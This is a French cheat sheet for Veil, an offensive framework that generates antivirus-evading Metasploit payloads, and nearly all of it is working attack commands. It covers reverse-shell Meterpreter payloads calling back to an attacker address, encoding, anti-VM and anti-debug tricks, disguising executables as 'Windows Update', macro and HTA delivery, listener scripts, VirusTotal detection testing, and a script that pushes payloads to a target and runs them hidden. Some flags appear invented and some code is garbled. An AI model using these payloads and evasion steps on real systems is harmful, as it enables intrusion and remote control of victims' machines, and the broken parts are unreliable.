Feuille de Triche Veil
Aperçu
Veil est un outil conçu pour générer des charges utiles Metasploit qui contournent les solutions antivirus courantes. Il fait partie du Veil-Framework et se concentre sur la génération et l’encodage de charges utiles pour échapper à la détection par les logiciels antivirus et les systèmes de protection des points de terminaison. Veil prend en charge plusieurs langages de programmation et techniques d’encodage pour créer des charges utiles indétectables pour les tests de pénétration et les opérations de red teaming.
⚠️ Avertissement : Utilisez Veil uniquement dans des environnements qui vous appartiennent ou pour lesquels vous avez une autorisation explicite de test. L’utilisation non autorisée peut violer les conditions de service ou les lois locales. Cet outil est destiné uniquement à des fins légitimes de test de sécurité.
Installation
Installation Automatique
# Clone the repository
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Run the setup script
sudo ./config/setup.sh --force --silent
# Verify installation
./Veil.py --versionInstallation Manuelle
# Install dependencies
sudo apt update
sudo apt install -y python3 python3-pip git
# Install Python dependencies
pip3 install pycrypto
pip3 install distorm3
pip3 install pefile
pip3 install capstone
# Install additional tools
sudo apt install -y mingw-w64
sudo apt install -y mono-mcs
sudo apt install -y golang-go
# Clone Veil
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Make executable
chmod +x Veil.pyInstallation Docker
# Pull Docker image
docker pull mattiasohlsson/veil
# Run Veil in Docker
docker run -it --rm -v $(pwd):/output mattiasohlsson/veil
# Create alias for easier usage
echo 'alias veil="docker run -it --rm -v $(pwd):/output mattiasohlsson/veil"' >> ~/.bashrc
source ~/.bashrcInstallation sur Kali Linux
# Veil is pre-installed on Kali Linux
veil
# If not installed, install via apt
sudo apt update
sudo apt install veil
# Update to latest version
cd /usr/share/veil
sudo git pullUtilisation de Base
Mode Interactif
# Start Veil in interactive mode
./Veil.py
# Or if installed system-wide
veil
# Navigate the menu system
# 1) Veil-Evasion (payload generation)
# 2) Veil-Ordnance (payload delivery)Mode Ligne de Commande
# List available payloads
./Veil.py -t Evasion --list-payloads
# Generate payload with specific options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate payload with custom options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-dir /tmp/payloads
# Show payload options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --payload-optionsGénération de Charges Utiles
Charges Utiles Python
# Python reverse TCP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Python reverse HTTP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Python reverse HTTPS Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Python shell reverse TCP
./Veil.py -t Evasion -p python/shellcode_inject/flat --ip 192.168.1.100 --port 4444
# Python with custom encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64Charges Utiles C#
# C# reverse TCP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# C# reverse HTTP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_http --ip 192.168.1.100 --port 80
# C# reverse HTTPS Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_https --ip 192.168.1.100 --port 443
# C# shellcode injection
./Veil.py -t Evasion -p cs/shellcode_inject/virtual --ip 192.168.1.100 --port 4444
# C# with process hollowing
./Veil.py -t Evasion -p cs/shellcode_inject/hollow --ip 192.168.1.100 --port 4444Charges Utiles PowerShell
# PowerShell reverse TCP
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# PowerShell reverse HTTP
./Veil.py -t Evasion -p powershell/meterpreter/rev_http --ip 192.168.1.100 --port 80
# PowerShell reverse HTTPS
./Veil.py -t Evasion -p powershell/meterpreter/rev_https --ip 192.168.1.100 --port 443
# PowerShell with obfuscation
./Veil.py -t Evasion -p powershell/shellcode_inject/psexec --ip 192.168.1.100 --port 4444Charges Utiles Go
# Go reverse TCP
./Veil.py -t Evasion -p go/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Go reverse HTTP
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Go reverse HTTPS
./Veil.py -t Evasion -p go/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Go with custom user agent
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80 --user-agent "Mozilla/5.0"Techniques Avancées d’Évasion
Encodage et Obfuscation
# Base64 encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
# XOR encoding
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding xor
# AES encryption
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encryption aes
# Multiple encoding layers
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64,xor
# Custom encoding key
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding-key "MySecretKey123"Techniques Anti-Analyse
# Sleep before execution
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --sleep 30
# Check for virtual machine
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --vm-check
# Check for debugger
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug-check
# Domain check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --domain-check
# Process check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --process-checkOptions Personnalisées de Charges Utiles
# Custom executable icon
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --icon /path/to/icon.ico
# Custom executable version info
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --version-info "Microsoft Corporation"
# Custom file description
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --file-description "System Update"
# Custom product name
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --product-name "Windows Update"
# Compile as service
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --serviceMéthodes de Livraison de Charges Utiles
Génération d’Exécutables
# Generate Windows executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type exe
# Generate DLL
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type dll
# Generate service executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type service
# Generate shellcode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type shellcode
# Generate PowerShell script
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type ps1Ordnance (Livraison de Charges Utiles)
# Start Veil-Ordnance
./Veil.py -t Ordnance
# Generate HTA payload
./Veil.py -t Ordnance -p hta/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate macro payload
./Veil.py -t Ordnance -p macro/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate SCT payload
./Veil.py -t Ordnance -p sct/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate JavaScript payload
./Veil.py -t Ordnance -p js/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444Intégration avec Metasploit
Configuration du Gestionnaire
# Start Metasploit handler for Veil payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_tcp;
set LHOST 192.168.1.100;
set LPORT 4444;
set ExitOnSession false;
exploit -j"
# Handler for HTTP payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_http;
set LHOST 192.168.1.100;
set LPORT 80;
exploit -j"
# Handler for HTTPS payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_https;
set LHOST 192.168.1.100;
set LPORT 443;
exploit -j"Scripts de Ressources
# Create Metasploit resource script
cat > veil_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
EOF
# Use resource script
msfconsole -r veil_handler.rc
# Multi-handler resource script
cat > multi_handler.rc ``<< 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 80
set ExitOnSession false
exploit -j
EOFScripts d’Automatisation
Génération de Charges Utiles par Lot
#!/bin/bash
# Generate multiple Veil payloads
LHOST="192.168.1.100"
OUTPUT_DIR="veil_payloads_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
# Array of payload configurations
declare -a PAYLOADS=(
"python/meterpreter/rev_tcp:4444:python_tcp"
"python/meterpreter/rev_http:80:python_http"
"cs/meterpreter/rev_tcp:4445:cs_tcp"
"cs/meterpreter/rev_http:8080:cs_http"
"powershell/meterpreter/rev_tcp:4446:ps_tcp"
"go/meterpreter/rev_tcp:4447:go_tcp"
)
echo "[+] Generating Veil payloads..."
echo "[+] LHOST: $LHOST"
echo "[+] Output directory: $OUTPUT_DIR"
for payload_config in "$\\\{PAYLOADS[@]\\\}"; do
IFS=':' read -r payload port name <<< "$payload_config"
echo "[+] Generating $name ($payload:$port)"
./Veil.py -t Evasion \
-p "$payload" \
--ip "$LHOST" \
--port "$port" \
--output-dir "$OUTPUT_DIR" \
--output-name "$name" \
--force
if [ $? -eq 0 ]; then
echo " ✓ Success: $name"
else
echo " ✗ Failed: $name"
fi
done
echo "[+] Payload generation completed"
echo "[+] Generated files:"
ls -la "$OUTPUT_DIR"
# Generate Metasploit resource script
cat >`` "$OUTPUT_DIR/handlers.rc" << EOF
# Metasploit handlers for generated payloads
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 80
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4445
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 8080
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4446
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4447
set ExitOnSession false
exploit -j
EOF
echo "[+] Metasploit resource script created: $OUTPUT_DIR/handlers.rc"Script de Test de Charges Utiles```bash
#!/bin/bash
Test generated payloads against antivirus
PAYLOAD_DIR=“$1” VIRUSTOTAL_API_KEY=“your_api_key_here”
if [ -z “$PAYLOAD_DIR” ]; then echo “Usage: $0 <payload_directory>” exit 1 fi
if [ ! -d “$PAYLOAD_DIR” ]; then echo “Error: Directory not found: $PAYLOAD_DIR” exit 1 fi
echo ”[+] Testing payloads in: $PAYLOAD_DIR”
Function to upload to VirusTotal
upload_to_vt() \\{ local file=“$1” local filename=$(basename “$file”)
echo "[+] Uploading $filename to VirusTotal..."
response=$(curl -s -X POST \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
-F "file=@$file" \
"https://www.virustotal.com/api/v3/files")
if [ $? -eq 0 ]; then
scan_id=$(echo "$response"|jq -r '.data.id')
echo " Scan ID: $scan_id"
echo "$filename:$scan_id" >> "$PAYLOAD_DIR/vt_scans.txt"
else
echo " Upload failed"
fi\\}
Function to check scan results
check_vt_results() \\{ local scan_id=“$1” local filename=“$2”
echo "[+] Checking results for $filename..."
response=$(curl -s -X GET \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
"https://www.virustotal.com/api/v3/analyses/$scan_id")
if [ $? -eq 0 ]; then
status=$(echo "$response"|jq -r '.data.attributes.status')
if [ "$status" = "completed" ]; then
stats=$(echo "$response"|jq -r '.data.attributes.stats')
malicious=$(echo "$stats"|jq -r '.malicious')
suspicious=$(echo "$stats"|jq -r '.suspicious')
undetected=$(echo "$stats"|jq -r '.undetected')
echo " Status: $status"
echo " Malicious: $malicious"
echo " Suspicious: $suspicious"
echo " Undetected: $undetected"
echo "$filename,$malicious,$suspicious,$undetected" >> "$PAYLOAD_DIR/detection_results.csv"
else
echo " Status: $status (still processing)"
fi
else
echo " Failed to get results"
fi\\}
Upload all executables
echo ”[+] Uploading payloads…” for file in “$PAYLOAD_DIR”/*.exe; do if [ -f “$file” ]; then upload_to_vt “$file” sleep 15 # Rate limiting fi done
echo ”[+] Waiting for scans to complete…” sleep 300 # Wait 5 minutes
Check results
if [ -f “$PAYLOAD_DIR/vt_scans.txt” ]; then echo “filename,malicious,suspicious,undetected” > “$PAYLOAD_DIR/detection_results.csv”
while IFS=':' read -r filename scan_id; do
check_vt_results "$scan_id" "$filename"
sleep 15 # Rate limiting
done < "$PAYLOAD_DIR/vt_scans.txt"
echo "[+] Results saved to: $PAYLOAD_DIR/detection_results.csv"else echo ”[-] No scans to check” fi
```bash
#!/bin/bash
# Deploy Veil payloads for testing
PAYLOAD_DIR="$1"
TARGET_HOST="$2"
TARGET_USER="$3"
if [ $# -ne 3 ]; then
echo "Usage: $0 <payload_directory> <target_host> <target_user>"
exit 1
fi
echo "[+] Deploying payloads to $TARGET_HOST"
# Create remote directory
ssh "$TARGET_USER@$TARGET_HOST" "mkdir -p /tmp/test_payloads"
# Copy payloads
for file in "$PAYLOAD_DIR"/*.exe; do
if [ -f "$file" ]; then
filename=$(basename "$file")
echo "[+] Copying $filename..."
scp "$file" "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
if [ $? -eq 0 ]; then
echo " ✓ Copied successfully"
else
echo " ✗ Copy failed"
fi
fi
done
# Create execution script
cat > /tmp/execute_payloads.ps1 << 'EOF'
# PowerShell script to execute payloads
$payloadDir = "C:\tmp\test_payloads"
$logFile = "$payloadDir\execution_log.txt"
Get-ChildItem -Path $payloadDir -Filter "*.exe"|ForEach-Object \\\\{
$payload = $_.FullName
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
Write-Host "[+] Executing: $($_.Name)"
Add-Content -Path $logFile -Value "$timestamp - Executing: $($_.Name)"
try \\\\{
Start-Process -FilePath $payload -WindowStyle Hidden
Add-Content -Path $logFile -Value "$timestamp - Success: $($_.Name)"
\\\\}
catch \\\\{
Add-Content -Path $logFile -Value "$timestamp - Failed: $($_.Name) - $($_.Exception.Message)"
\\\\}
Start-Sleep -Seconds 5
\\\\}
EOF
# Copy execution script
scp /tmp/execute_payloads.ps1 "$TARGET_USER@$TARGET_HOST:/tmp/test_payloads/"
echo "[+] Deployment completed"
echo "[+] To execute payloads on target:"
echo " ssh $TARGET_USER@$TARGET_HOST"
echo " powershell -ExecutionPolicy Bypass -File /tmp/test_payloads/execute_payloads.ps1"
rm /tmp/execute_payloads.ps1
```## Tests d'Évasion
### Tests Antivirus
```bash
# Test against Windows Defender
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test defender
# Test against multiple AV engines
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test all
# Generate report
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-report
# Custom AV testing
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-engines "defender,kaspersky,norton"
```### Évasion de Sandbox
```bash
# Generate payload with sandbox evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--sandbox-evasion \
--sleep 60 \
--vm-check \
--debug-check
# Time-based evasion
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--time-check \
--execution-delay 300
# Environment checks
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \
--ip 192.168.1.100 \
--port 4444 \
--domain-check \
--process-check \
--file-check
```## Dépannage
### Problèmes Courants
#### Problèmes d'Installation
```bash
# Fix missing dependencies
sudo apt update
sudo apt install -y python3-dev python3-pip
pip3 install --upgrade pip
# Fix Wine issues (for Windows compilation)
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32
# Fix MinGW issues
sudo apt install mingw-w64-i686-dev mingw-w64-x86-64-dev
# Reinstall Veil
cd Veil
sudo ./config/setup.sh --forceErreurs de Compilation
# Check compiler availability
which i686-w64-mingw32-gcc
which x86_64-w64-mingw32-gcc
# Fix C# compilation
sudo apt install mono-mcs mono-complete
# Fix Go compilation
export GOPATH=/usr/share/veil/go
export PATH=$PATH:/usr/local/go/bin
# Debug compilation
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debugProblèmes de Payload
# Test payload generation
./Veil.py -t Evasion --list-payloads|grep meterpreter
# Check payload options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --payload-options
# Verify output
file /var/lib/veil/output/compiled/payload.exe
strings /var/lib/veil/output/compiled/payload.exe|grep -i meterpreter
# Test payload execution
wine /var/lib/veil/output/compiled/payload.exeDébogage et Journalisation
# Enable debug mode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
# Check Veil logs
tail -f /var/lib/veil/output/veil.log
# Verbose output
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --verbose
# Check compilation output
cat /var/lib/veil/output/source/payload.csRessources
- Framework Veil Officiel
- Documentation Veil
- Metasploit Framework
- Techniques d’Évasion Antivirus
- Meilleures Pratiques de Génération de Payload
- Format PE Windows
- Techniques d’Obfuscation de Code
Ce guide de référence fournit une référence complète pour l’utilisation de Veil pour la génération de payload et l’évasion antivirus. Assurez-vous toujours d’avoir une autorisation appropriée avant d’utiliser cet outil dans n’importe quel environnement.